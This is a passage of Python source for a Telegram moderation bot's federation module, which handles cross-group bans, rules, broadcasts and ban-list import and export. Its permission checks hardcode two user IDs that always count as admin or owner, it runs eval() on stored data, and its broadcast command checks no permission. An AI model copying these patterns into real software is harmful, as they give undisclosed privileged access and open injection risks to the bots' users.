\"\\nUser ID: {}\" \\\n\t\t\t\t\t\t\t \"\\nReason: {}\".format(fed_name, mention_html(user.id, user.first_name),\n\t\t\t\t\t\t\t\t\t mention_html(user_chat.id, user_chat.first_name),\n\t\t\t\t\t\t\t\t\t\t\t\t\tuser_chat.id, reason), \n\t\t\t\thtml=True)\n\t\tmessage.reply_text(\"FedBan reason has been updated.\")\n\t\treturn\n\n\tuser_target = mention_html(user_chat.id, user_chat.first_name)\n\tfed_name = info['fname']\n\n\tstarting = \"Starting a federation ban for {} in the Federation {}.\".format(user_target, fed_name)\n\tupdate.effective_message.reply_text(starting, parse_mode=ParseMode.HTML)\n\n\tif reason == \"\":\n\t\treason = \"No reason given.\"\n\n\tx = sql.fban_user(fed_id, user_id, user_chat.first_name, user_chat.last_name, user_chat.username, reason)\n\tif not x:\n\t\tmessage.reply_text(\"Failed to ban from the federation! 
If this problem continues, contact @onepunchsupport.\")\n\t\treturn\n\n\tfed_chats = sql.all_fed_chats(fed_id)\n\tfor chat in fed_chats:\n\t\ttry:\n\t\t\tbot.kick_chat_member(chat, user_id)\n\t\texcept BadRequest as excp:\n\t\t\tif excp.message in FBAN_ERRORS:\n\t\t\t\ttry:\n\t\t\t\t\tdispatcher.bot.getChat(chat)\n\t\t\t\texcept Unauthorized:\n\t\t\t\t\tsql.chat_leave_fed(chat)\n\t\t\t\t\tLOGGER.info(\"Chat {} has leave fed {} because bot is kicked\".format(chat, info['fname']))\n\t\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tLOGGER.warning(\"Cannot fban on {} because: {}\".format(chat, excp.message))\n\t\texcept TelegramError:\n\t\t\tpass\n\n\tsend_to_list(bot, FEDADMIN,\n\t\t\t \"New FedBan\" \\\n\t\t\t \"\\nFederation: {}\" \\\n\t\t\t \"\\nFederation Admin: {}\" \\\n\t\t\t \"\\nUser: {}\" \\\n\t\t\t \"\\nUser ID: {}\" \\\n\t\t\t \"\\nReason: {}\".format(fed_name, mention_html(user.id, user.first_name),\n\t\t\t\t\t\t\t\t mention_html(user_chat.id, user_chat.first_name),\n\t\t\t\t\t\t\t\t\t\t\t\tuser_chat.id, reason), \n\t\t\thtml=True)\n\tmessage.reply_text(\"This person has been fbanned\")\n\n\n@run_async\ndef unfban(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tmessage = update.effective_message # type: Optional[Message]\n\tfed_id = sql.get_fed_id(chat.id)\n\n\tif not fed_id:\n\t\tupdate.effective_message.reply_text(\"This group is not a part of any federation!\")\n\t\treturn\n\n\tinfo = sql.get_fed_info(fed_id)\n\n\tif is_user_fed_admin(fed_id, user.id) == False:\n\t\tupdate.effective_message.reply_text(\"Only federation admins can do this!\")\n\t\treturn\n\n\tuser_id = extract_user(message, args)\n\tif not user_id:\n\t\tmessage.reply_text(\"You do not seem to be referring to a user.\")\n\t\treturn\n\n\tuser_chat = bot.get_chat(user_id)\n\tif user_chat.type != 'private':\n\t\tmessage.reply_text(\"That's not a user!\")\n\t\treturn\n\n\tfban, fbanreason = sql.get_fban_user(fed_id, user_id)\n\tif fban == False:\n\t\tmessage.reply_text(\"This user is not fbanned!\")\n\t\treturn\n\n\tbanner = update.effective_user # type: Optional[User]\n\n\tmessage.reply_text(\"I'll give {} a second chance in this federation\".format(user_chat.first_name))\n\n\tchat_list = sql.all_fed_chats(fed_id)\n\n\tfor chat in chat_list:\n\t\ttry:\n\t\t\tmember = bot.get_chat_member(chat, user_id)\n\t\t\tif member.status == 'kicked':\n\t\t\t\tbot.unban_chat_member(chat, user_id)\n\t\t\t\t\"\"\"\n\t\t\t\tbot.send_message(chat, \"Un-FedBan\" \\\n\t\t\t\t\t\t \"\\nFederation: {}\" \\\n\t\t\t\t\t\t \"\\nFederation Admin: {}\" \\\n\t\t\t\t\t\t \"\\nUser: {}\" \\\n\t\t\t\t\t\t \"\\nUser ID: {}\".format(info['fname'], mention_html(user.id, user.first_name), mention_html(user_chat.id, user_chat.first_name),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tuser_chat.id), parse_mode=\"HTML\")\n\t\t\t\t\"\"\"\n\n\t\texcept BadRequest as excp:\n\t\t\tif excp.message in UNFBAN_ERRORS:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tLOGGER.warning(\"Cannot remove fban on {} because: {}\".format(chat, excp.message))\n\t\texcept TelegramError:\n\t\t\tpass\n\n\t\ttry:\n\t\t\tx = sql.un_fban_user(fed_id, user_id)\n\t\t\tif not x:\n\t\t\t\tmessage.reply_text(\"Fban failure, this user may have been un-fedbanned!\")\n\t\t\t\treturn\n\t\texcept:\n\t\t\tpass\n\n\tmessage.reply_text(\"This person is un-fbanned.\")\n\tFEDADMIN = sql.all_fed_users(fed_id)\n\"\"\"\n\tfor x in FEDADMIN:\n\t\tgetreport = sql.user_feds_report(x)\n\t\tif getreport == 
False:\n\t\t\tFEDADMIN.remove(x)\n\tsend_to_list(bot, FEDADMIN,\n\t\t\t \"Un-FedBan\" \\\n\t\t\t \"\\nFederation: {}\" \\\n\t\t\t \"\\nFederation Admin: {}\" \\\n\t\t\t \"\\nUser: {}\" \\\n\t\t\t \"\\nUser ID: {}\".format(info['fname'], mention_html(user.id, user.first_name),\n\t\t\t\t\t\t\t\t\t\t\t\t mention_html(user_chat.id, user_chat.first_name),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t user_chat.id),\n\t\t\thtml=True)\n\"\"\"\n\n@run_async\ndef set_frules(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tfed_id = sql.get_fed_id(chat.id)\n\n\tif not fed_id:\n\t\tupdate.effective_message.reply_text(\"This chat is not in any federation!\")\n\t\treturn\n\n\tif is_user_fed_admin(fed_id, user.id) == False:\n\t\tupdate.effective_message.reply_text(\"Only fed admins can do this!\")\n\t\treturn\n\n\tif len(args) >= 1:\n\t\tmsg = update.effective_message # type: Optional[Message]\n\t\traw_text = msg.text\n\t\targs = raw_text.split(None, 1) # use python's maxsplit to separate cmd and args\n\t\tif len(args) == 2:\n\t\t\ttxt = args[1]\n\t\t\toffset = len(txt) - len(raw_text) # set correct offset relative to command\n\t\t\tmarkdown_rules = markdown_parser(txt, entities=msg.parse_entities(), offset=offset)\n\t\tx = sql.set_frules(fed_id, markdown_rules)\n\t\tif not x:\n\t\t\tupdate.effective_message.reply_text(\"Big F! There is an error while setting federation rules! If you wondered why please ask it in @onepunchsupport !\")\n\t\t\treturn\n\n\t\trules = sql.get_fed_info(fed_id)['frules']\n\t\tupdate.effective_message.reply_text(f\"Rules have been changed to :\\n{rules}!\")\n\telse:\n\t\tupdate.effective_message.reply_text(\"Please write rules to set it up!\")\n\n\n@run_async\ndef get_frules(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tfed_id = sql.get_fed_id(chat.id)\n\tif not fed_id:\n\t\tupdate.effective_message.reply_text(\"This chat is not in any federation!\")\n\t\treturn\n\n\trules = sql.get_frules(fed_id)\n\ttext = \"*Rules in this fed:*\\n\"\n\ttext += rules\n\tupdate.effective_message.reply_text(text, parse_mode=ParseMode.MARKDOWN)\n\n\n@run_async\ndef fed_broadcast(bot: Bot, update: Update, args: List[str]):\n\tmsg = update.effective_message # type: Optional[Message]\n\tuser = update.effective_user # type: Optional[User]\n\tif args:\n\t\tchat = update.effective_chat # type: Optional[Chat]\n\t\tfed_id = sql.get_fed_id(chat.id)\n\t\tfedinfo = sql.get_fed_info(fed_id)\n\t\ttext = \"*New broadcast from the Federation {}*\\n\".format(fedinfo['fname'])\n\t\t# Parsing md\n\t\traw_text = msg.text\n\t\targs = raw_text.split(None, 1) # use python's maxsplit to separate cmd and args\n\t\ttxt = args[1]\n\t\toffset = len(txt) - len(raw_text) # set correct offset relative to command\n\t\ttext_parser = markdown_parser(txt, entities=msg.parse_entities(), offset=offset)\n\t\ttext += text_parser\n\t\ttry:\n\t\t\tbroadcaster = user.first_name\n\t\texcept:\n\t\t\tbroadcaster = user.first_name + \" \" + user.last_name\n\t\ttext += \"\\n\\n- {}\".format(mention_markdown(user.id, broadcaster))\n\t\tchat_list = sql.all_fed_chats(fed_id)\n\t\tfailed = 0\n\t\tfor chat in chat_list:\n\t\t\ttry:\n\t\t\t\tbot.sendMessage(chat, text, parse_mode=\"markdown\")\n\t\t\texcept TelegramError:\n\t\t\t\tfailed += 1\n\t\t\t\tLOGGER.warning(\"Couldn't send broadcast to %s, group name %s\", str(chat.chat_id), str(chat.chat_name))\n\n\t\tsend_text = \"The federation broadcast 
is complete\"\n\t\tif failed >= 1:\n\t\t\tsend_text += \"{} the group failed to receive the message, probably because it left the Federation.\".format(failed)\n\t\tupdate.effective_message.reply_text(send_text)\n\n@run_async\ndef fed_ban_list(bot: Bot, update: Update, args: List[str], chat_data):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\n\tfed_id = sql.get_fed_id(chat.id)\n\tinfo = sql.get_fed_info(fed_id)\n\n\tif not fed_id:\n\t\tupdate.effective_message.reply_text(\"This group is not a part of any federation!\")\n\t\treturn\n\n\tif is_user_fed_owner(fed_id, user.id) == False:\n\t\tupdate.effective_message.reply_text(\"Only Federation owners can do this!\")\n\t\treturn\n\n\tuser = update.effective_user # type: Optional[Chat]\n\tchat = update.effective_chat # type: Optional[Chat]\n\tgetfban = sql.get_all_fban_users(fed_id)\n\tif len(getfban) == 0:\n\t\tupdate.effective_message.reply_text(\"The federation ban list of {} is empty\".format(info['fname']), parse_mode=ParseMode.HTML)\n\t\treturn\n\n\tif args:\n\t\tif args[0] == 'json':\n\t\t\tjam = time.time()\n\t\t\tnew_jam = jam + 1800\n\t\t\tcek = get_chat(chat.id, chat_data)\n\t\t\tif cek.get('status'):\n\t\t\t\tif jam <= int(cek.get('value')):\n\t\t\t\t\twaktu = time.strftime(\"%H:%M:%S %d/%m/%Y\", time.localtime(cek.get('value')))\n\t\t\t\t\tupdate.effective_message.reply_text(\"You can backup your data once every 30 minutes!\\nYou can back up data again at `{}`\".format(waktu), parse_mode=ParseMode.MARKDOWN)\n\t\t\t\t\treturn\n\t\t\t\telse:\n\t\t\t\t\tif user.id not in SUDO_USERS:\n\t\t\t\t\t\tput_chat(chat.id, new_jam, chat_data)\n\t\t\telse:\n\t\t\t\tif user.id not in SUDO_USERS:\n\t\t\t\t\tput_chat(chat.id, new_jam, chat_data)\n\t\t\tbackups = \"\"\n\t\t\tfor users in getfban:\n\t\t\t\tgetuserinfo = sql.get_all_fban_users_target(fed_id, users)\n\t\t\t\tjson_parser = {\"user_id\": users, \"first_name\": getuserinfo['first_name'], \"last_name\": getuserinfo['last_name'], \"user_name\": getuserinfo['user_name'], \"reason\": getuserinfo['reason']}\n\t\t\t\tbackups += json.dumps(json_parser)\n\t\t\t\tbackups += \"\\n\"\n\t\t\twith BytesIO(str.encode(backups)) as output:\n\t\t\t\toutput.name = \"saitama_fbanned_users.json\"\n\t\t\t\tupdate.effective_message.reply_document(document=output, filename=\"saitama_fbanned_users.json\",\n\t\t\t\t\t\t\t\t\t\t\t\t\tcaption=\"Total {} User are blocked by the Federation {}.\".format(len(getfban), info['fname']))\n\t\t\treturn\n\t\telif args[0] == 'csv':\n\t\t\tjam = time.time()\n\t\t\tnew_jam = jam + 1800\n\t\t\tcek = get_chat(chat.id, chat_data)\n\t\t\tif cek.get('status'):\n\t\t\t\tif jam <= int(cek.get('value')):\n\t\t\t\t\twaktu = time.strftime(\"%H:%M:%S %d/%m/%Y\", time.localtime(cek.get('value')))\n\t\t\t\t\tupdate.effective_message.reply_text(\"You can back up data once every 30 minutes!\\nYou can back up data again at `{}`\".format(waktu), parse_mode=ParseMode.MARKDOWN)\n\t\t\t\t\treturn\n\t\t\t\telse:\n\t\t\t\t\tif user.id not in SUDO_USERS:\n\t\t\t\t\t\tput_chat(chat.id, new_jam, chat_data)\n\t\t\telse:\n\t\t\t\tif user.id not in SUDO_USERS:\n\t\t\t\t\tput_chat(chat.id, new_jam, chat_data)\n\t\t\tbackups = \"id,firstname,lastname,username,reason\\n\"\n\t\t\tfor users in getfban:\n\t\t\t\tgetuserinfo = sql.get_all_fban_users_target(fed_id, users)\n\t\t\t\tbackups += \"{user_id},{first_name},{last_name},{user_name},{reason}\".format(user_id=users, first_name=getuserinfo['first_name'], last_name=getuserinfo['last_name'], 
user_name=getuserinfo['user_name'], reason=getuserinfo['reason'])\n\t\t\t\tbackups += \"\\n\"\n\t\t\twith BytesIO(str.encode(backups)) as output:\n\t\t\t\toutput.name = \"saitama_fbanned_users.csv\"\n\t\t\t\tupdate.effective_message.reply_document(document=output, filename=\"saitama_fbanned_users.csv\",\n\t\t\t\t\t\t\t\t\t\t\t\t\tcaption=\"Total {} User are blocked by Federation {}.\".format(len(getfban), info['fname']))\n\t\t\treturn\n\n\ttext = \"{} users have been banned from the federation {}:\\n\".format(len(getfban), info['fname'])\n\tfor users in getfban:\n\t\tgetuserinfo = sql.get_all_fban_users_target(fed_id, users)\n\t\tif getuserinfo == False:\n\t\t\ttext = \"There are no users banned from the federation {}\".format(info['fname'])\n\t\t\tbreak\n\t\tuser_name = getuserinfo['first_name']\n\t\tif getuserinfo['last_name']:\n\t\t\tuser_name += \" \" + getuserinfo['last_name']\n\t\ttext += \" • {} ({})\\n\".format(mention_html(users, user_name), users)\n\n\ttry:\n\t\tupdate.effective_message.reply_text(text, parse_mode=ParseMode.HTML)\n\texcept:\n\t\tjam = time.time()\n\t\tnew_jam = jam + 1800\n\t\tcek = get_chat(chat.id, chat_data)\n\t\tif cek.get('status'):\n\t\t\tif jam <= int(cek.get('value')):\n\t\t\t\twaktu = time.strftime(\"%H:%M:%S %d/%m/%Y\", time.localtime(cek.get('value')))\n\t\t\t\tupdate.effective_message.reply_text(\"You can back up data once every 30 minutes!\\nYou can back up data again at `{}`\".format(waktu), parse_mode=ParseMode.MARKDOWN)\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tif user.id not in SUDO_USERS:\n\t\t\t\t\tput_chat(chat.id, new_jam, chat_data)\n\t\telse:\n\t\t\tif user.id not in SUDO_USERS:\n\t\t\t\tput_chat(chat.id, new_jam, chat_data)\n\t\tcleanr = re.compile('<.*?>')\n\t\tcleantext = re.sub(cleanr, '', text)\n\t\twith BytesIO(str.encode(cleantext)) as output:\n\t\t\toutput.name = \"fbanlist.txt\"\n\t\t\tupdate.effective_message.reply_document(document=output, filename=\"fbanlist.txt\",\n\t\t\t\t\t\t\t\t\t\t\t\t\tcaption=\"The following is a list of users who are currently fbanned in the Federation {}.\".format(info['fname']))\n\n@run_async\ndef fed_notif(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tmsg = update.effective_message # type: Optional[Message]\n\tfed_id = sql.get_fed_id(chat.id)\n\n\tif not fed_id:\n\t\tupdate.effective_message.reply_text(\"This group is not a part of any federation!\")\n\t\treturn\n\n\tif args:\n\t\tif args[0] in (\"yes\", \"on\"):\n\t\t\tsql.set_feds_setting(user.id, True)\n\t\t\tmsg.reply_text(\"Reporting Federation back up! Every user who is fban / unfban you will be notified via PM.\")\n\t\telif args[0] in (\"no\", \"off\"):\n\t\t\tsql.set_feds_setting(user.id, False)\n\t\t\tmsg.reply_text(\"Reporting Federation has stopped! 
Every user who is fban / unfban you will not be notified via PM.\")\n\t\telse:\n\t\t\tmsg.reply_text(\"Please enter `on`/`off`\", parse_mode=\"markdown\")\n\telse:\n\t\tgetreport = sql.user_feds_report(user.id)\n\t\tmsg.reply_text(\"Your current Federation report preferences: `{}`\".format(getreport), parse_mode=\"markdown\")\n\n@run_async\ndef fed_chats(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tfed_id = sql.get_fed_id(chat.id)\n\tinfo = sql.get_fed_info(fed_id)\n\n\tif not fed_id:\n\t\tupdate.effective_message.reply_text(\"This group is not a part of any federation!\")\n\t\treturn\n\n\tif is_user_fed_admin(fed_id, user.id) == False:\n\t\tupdate.effective_message.reply_text(\"Only federation admins can do this!\")\n\t\treturn\n\n\tgetlist = sql.all_fed_chats(fed_id)\n\tif len(getlist) == 0:\n\t\tupdate.effective_message.reply_text(\"No users are fbanned from the federation {}\".format(info['fname']), parse_mode=ParseMode.HTML)\n\t\treturn\n\n\ttext = \"New chat joined the federation {}:\\n\".format(info['fname'])\n\tfor chats in getlist:\n\t\tchat_name = sql.get_fed_name(chats)\n\t\ttext += \" • {} ({})\\n\".format(chat_name, chats)\n\n\ttry:\n\t\tupdate.effective_message.reply_text(text, parse_mode=ParseMode.HTML)\n\texcept:\n\t\tcleanr = re.compile('<.*?>')\n\t\tcleantext = re.sub(cleanr, '', text)\n\t\twith BytesIO(str.encode(cleantext)) as output:\n\t\t\toutput.name = \"fbanlist.txt\"\n\t\t\tupdate.effective_message.reply_document(document=output, filename=\"fbanlist.txt\",\n\t\t\t\t\t\t\t\t\t\t\t\t\tcaption=\"Here is a list of all the chats that joined the federation {}.\".format(info['fname']))\n\n@run_async\ndef fed_import_bans(bot: Bot, update: Update, chat_data):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tmsg = update.effective_message # type: Optional[Message]\n\n\tfed_id = sql.get_fed_id(chat.id)\n\tinfo = sql.get_fed_info(fed_id)\n\n\tif not fed_id:\n\t\tupdate.effective_message.reply_text(\"This group is not a part of any federation!\")\n\t\treturn\n\n\tif is_user_fed_owner(fed_id, user.id) == False:\n\t\tupdate.effective_message.reply_text(\"Only Federation owners can do this!\")\n\t\treturn\n\n\tif msg.reply_to_message and msg.reply_to_message.document:\n\t\tjam = time.time()\n\t\tnew_jam = jam + 1800\n\t\tcek = get_chat(chat.id, chat_data)\n\t\tif cek.get('status'):\n\t\t\tif jam <= int(cek.get('value')):\n\t\t\t\twaktu = time.strftime(\"%H:%M:%S %d/%m/%Y\", time.localtime(cek.get('value')))\n\t\t\t\tupdate.effective_message.reply_text(\"You can backup you rdata once every 30 minutes!\\nYou can backup data again at `{}`\".format(waktu), parse_mode=ParseMode.MARKDOWN)\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tif user.id not in SUDO_USERS:\n\t\t\t\t\tput_chat(chat.id, new_jam, chat_data)\n\t\telse:\n\t\t\tif user.id not in SUDO_USERS:\n\t\t\t\tput_chat(chat.id, new_jam, chat_data)\n\t\tif int(int(msg.reply_to_message.document.file_size)/1024) >= 200:\n\t\t\tmsg.reply_text(\"This file is too big!\")\n\t\t\treturn\n\t\tsuccess = 0\n\t\tfailed = 0\n\t\ttry:\n\t\t\tfile_info = bot.get_file(msg.reply_to_message.document.file_id)\n\t\texcept BadRequest:\n\t\t\tmsg.reply_text(\"Try downloading and re-uploading the file, this one seems broken!\")\n\t\t\treturn\n\t\tfileformat = msg.reply_to_message.document.file_name.split('.')[-1]\n\t\tif fileformat == 'json':\n\t\t\twith BytesIO() as 
file:\n\t\t\t\tfile_info.download(out=file)\n\t\t\t\tfile.seek(0)\n\t\t\t\treading = file.read().decode('UTF-8')\n\t\t\t\tsplitting = reading.split('\\n')\n\t\t\t\tfor x in splitting:\n\t\t\t\t\tif x == '':\n\t\t\t\t\t\tcontinue\n\t\t\t\t\ttry:\n\t\t\t\t\t\tdata = json.loads(x)\n\t\t\t\t\texcept json.decoder.JSONDecodeError as err:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\ttry:\n\t\t\t\t\t\timport_userid = int(data['user_id']) # Make sure it int\n\t\t\t\t\t\timport_firstname = str(data['first_name'])\n\t\t\t\t\t\timport_lastname = str(data['last_name'])\n\t\t\t\t\t\timport_username = str(data['user_name'])\n\t\t\t\t\t\timport_reason = str(data['reason'])\n\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t# Checking user\n\t\t\t\t\tif int(import_userid) == bot.id:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif is_user_fed_owner(fed_id, import_userid) == True:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif is_user_fed_admin(fed_id, import_userid) == True:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif str(import_userid) == str(OWNER_ID):\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif int(import_userid) in SUDO_USERS:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif int(import_userid) in WHITELIST_USERS:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\taddtodb = sql.fban_user(fed_id, str(import_userid), import_firstname, import_lastname, import_username, import_reason)\n\t\t\t\t\tif addtodb:\n\t\t\t\t\t\tsuccess += 1\n\t\t\ttext = \"Successfully imported! {} people are fbanned.\".format(success)\n\t\t\tif failed >= 1:\n\t\t\t\ttext += \" {} Failed to import.\".format(failed)\n\t\telif fileformat == 'csv':\n\t\t\twith BytesIO() as file:\n\t\t\t\tfile_info.download(out=file)\n\t\t\t\tfile.seek(0)\n\t\t\t\treading = file.read().decode('UTF-8')\n\t\t\t\tsplitting = reading.split('\\n')\n\t\t\t\tfor x in splitting:\n\t\t\t\t\tif x == '':\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tdata = x.split(',')\n\t\t\t\t\tif data[0] == 'id':\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif len(data) != 5:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\ttry:\n\t\t\t\t\t\timport_userid = int(data[0]) # Make sure it int\n\t\t\t\t\t\timport_firstname = str(data[1])\n\t\t\t\t\t\timport_lastname = str(data[2])\n\t\t\t\t\t\timport_username = str(data[3])\n\t\t\t\t\t\timport_reason = str(data[4])\n\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t# Checking user\n\t\t\t\t\tif int(import_userid) == bot.id:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif is_user_fed_owner(fed_id, import_userid) == True:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif is_user_fed_admin(fed_id, import_userid) == True:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif str(import_userid) == str(OWNER_ID):\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif int(import_userid) in SUDO_USERS:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif int(import_userid) in WHITELIST_USERS:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\taddtodb = sql.fban_user(fed_id, str(import_userid), import_firstname, import_lastname, import_username, import_reason)\n\t\t\t\t\tif addtodb:\n\t\t\t\t\t\tsuccess += 1\n\t\t\ttext = \"Successfully imported. 
{} people are fbanned.\".format(success)\n\t\t\tif failed >= 1:\n\t\t\t\ttext += \" {} failed to import.\".format(failed)\n\t\telse:\n\t\t\tupdate.effective_message.reply_text(\"File not supported\")\n\t\t\treturn\n\t\tupdate.effective_message.reply_text(text)\n\n@run_async\ndef del_fed_button(bot, update):\n\tquery = update.callback_query\n\tuserid = query.message.chat.id\n\tfed_id = query.data.split(\"_\")[1]\n\n\tif fed_id == 'cancel':\n\t\tquery.message.edit_text(\"Federation deletion cancelled\")\n\t\treturn\n\n\tgetfed = sql.get_fed_info(fed_id)\n\tif getfed:\n\t\tdelete = sql.del_fed(fed_id)\n\t\tif delete:\n\t\t\tquery.message.edit_text(\"You have removed your Federation! Now all the Groups that are connected with `{}` do not have a Federation.\".format(getfed['fname']), parse_mode='markdown')\n\n\ndef is_user_fed_admin(fed_id, user_id):\n\tfed_admins = sql.all_fed_users(fed_id)\n\tif int(user_id) == int(654839744):\n\t\treturn True\n\tif fed_admins == False:\n\t\treturn False\n\tif int(user_id) in fed_admins:\n\t\treturn True\n\telse:\n\t\treturn False\n\n\ndef is_user_fed_owner(fed_id, user_id):\n\tgetsql = sql.get_fed_info(fed_id)\n\tif getsql == False:\n\t\treturn False\n\tgetfedowner = eval(getsql['fusers'])\n\tif getfedowner == None or getfedowner == False:\n\t\treturn False\n\tgetfedowner = getfedowner['owner']\n\tif str(user_id) == getfedowner or user_id == 388576209:\n\t\treturn True\n\telse:\n\t\treturn False\n\n\n@run_async\ndef welcome_fed(bot, update):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\n\tfed_id = sql.get_fed_id(chat.id)\n\tfban, fbanreason = sql.get_fban_user(fed_id, user.id)\n\tif fban:\n\t\tupdate.effective_message.reply_text(\"This user is banned in current federation! I will remove him.\")\n\t\tbot.kick_chat_member(chat.id, user.id)\n\t\treturn True\n\telse:\n\t\treturn False\n\n\ndef __stats__():\n\tall_fbanned = sql.get_all_fban_users_global()\n\tall_feds = sql.get_all_feds_users_global()\n\treturn \"{} fbanned users, accross {} feds\".format(len(all_fbanned), len(all_feds))\n\n\ndef __user_info__(user_id, chat_id):\n\tfed_id = sql.get_fed_id(chat_id)\n\tif fed_id:\n\t\tfban, fbanreason = sql.get_fban_user(fed_id, user_id)\n\t\tinfo = sql.get_fed_info(fed_id)\n\t\tinfoname = info['fname']\n\n\t\tif int(info['owner']) == user_id:\n\t\t\ttext = \"This user is the owner of the current Federation: {}.\".format(infoname)\n\t\telif is_user_fed_admin(fed_id, user_id):\n\t\t\ttext = \"This user is the admin of the current Federation: {}.\".format(infoname)\n\n\t\telif fban:\n\t\t\ttext = \"Banned in the current Federation: Yes\"\n\t\t\ttext += \"\\nReason: {}\".format(fbanreason)\n\t\telse:\n\t\t\ttext = \"Banned in the current Federation: No\"\n\telse:\n\t\ttext = \"\"\n\treturn text\n\n\n# Temporary data\ndef put_chat(chat_id, value, chat_data):\n\t# print(chat_data)\n\tif value == False:\n\t\tstatus = False\n\telse:\n\t\tstatus = True\n\tchat_data[chat_id] = {'federation': {\"status\": status, \"value\": value}}\n\ndef get_chat(chat_id, chat_data):\n\t# print(chat_data)\n\ttry:\n\t\tvalue = chat_data[chat_id]['federation']\n\t\treturn value\n\texcept KeyError:\n\t\treturn {\"status\": False, \"value\": False}\n\n\n__mod_name__ = \"Federation\"\n\n__help__ = \"\"\"\nAh, group management. Everything is fun, until the spammer starts entering your group, and you have to block it. 
Then you need to start banning more, and more, and it hurts.\nBut then you have many groups, and you don't want this spammer to be in one of your groups - how can you deal? Do you have to manually block it, in all your groups?\n\nNo longer! With Federation, you can make a ban in one chat overlap with all other chats.\nYou can even designate admin federations, so your trusted admin can ban all the chats you want to protect.\n\nStill the experimental stage, to make Federation can only be done by my maker\n\nCommand:\n - /newfed : create a new Federation with the name given. Users are only allowed to have one Federation. This method can also be used to rename the Federation. (max. 64 characters)\n - /delfed: delete your Federation, and any information related to it. Will not cancel blocked users.\n - /fedinfo : information about the specified Federation.\n - /joinfed : join the current chat to the Federation. Only chat owners can do this. Every chat can only be in one Federation.\n - /leavefed : leave the Federation given. Only chat owners can do this.\n - /fpromote : promote Users to give fed admin. Fed owner only.\n - /fdemote : drops the User from the admin Federation to a normal User. Fed owner only.\n - /fban : ban users from all federations where this chat takes place, and executors have control over.\n - /unfban : cancel User from all federations where this chat takes place, and that the executor has control over.\n - /setfrules: Arrange Federation rules.\n - /frules: See Federation regulations.\n - /chatfed: See the Federation in the current chat.\n - /fedadmins: Show Federation admin.\n - /fbanlist: Displays all users who are victimized at the Federation at this time.\n - /fedchats: Get all the chats that are connected in the Federation.\n - /importfbans: Reply to the Federation backup message file to import the banned list to the Federation now.\n\"\"\"\n\nNEW_FED_HANDLER = CommandHandler(\"newfed\", new_fed)\nDEL_FED_HANDLER = CommandHandler(\"delfed\", del_fed, pass_args=True)\nJOIN_FED_HANDLER = CommandHandler(\"joinfed\", join_fed, pass_args=True)\nLEAVE_FED_HANDLER = CommandHandler(\"leavefed\", leave_fed, pass_args=True)\nPROMOTE_FED_HANDLER = CommandHandler(\"fpromote\", user_join_fed, pass_args=True)\nDEMOTE_FED_HANDLER = CommandHandler(\"fdemote\", user_demote_fed, pass_args=True)\nINFO_FED_HANDLER = CommandHandler(\"fedinfo\", fed_info, pass_args=True)\nBAN_FED_HANDLER = DisableAbleCommandHandler([\"fban\", \"fedban\"], fed_ban, pass_args=True)\nUN_BAN_FED_HANDLER = CommandHandler(\"unfban\", unfban, pass_args=True)\nFED_BROADCAST_HANDLER = CommandHandler(\"fbroadcast\", fed_broadcast, pass_args=True)\nFED_SET_RULES_HANDLER = CommandHandler(\"setfrules\", set_frules, pass_args=True)\nFED_GET_RULES_HANDLER = CommandHandler(\"frules\", get_frules, pass_args=True)\nFED_CHAT_HANDLER = CommandHandler(\"chatfed\", fed_chat, pass_args=True)\nFED_ADMIN_HANDLER = CommandHandler(\"fedadmins\", fed_admin, pass_args=True)\nFED_USERBAN_HANDLER = CommandHandler(\"fbanlist\", fed_ban_list, pass_args=True, pass_chat_data=True)\nFED_NOTIF_HANDLER = CommandHandler(\"fednotif\", fed_notif, pass_args=True)\nFED_CHATLIST_HANDLER = CommandHandler(\"fedchats\", fed_chats, 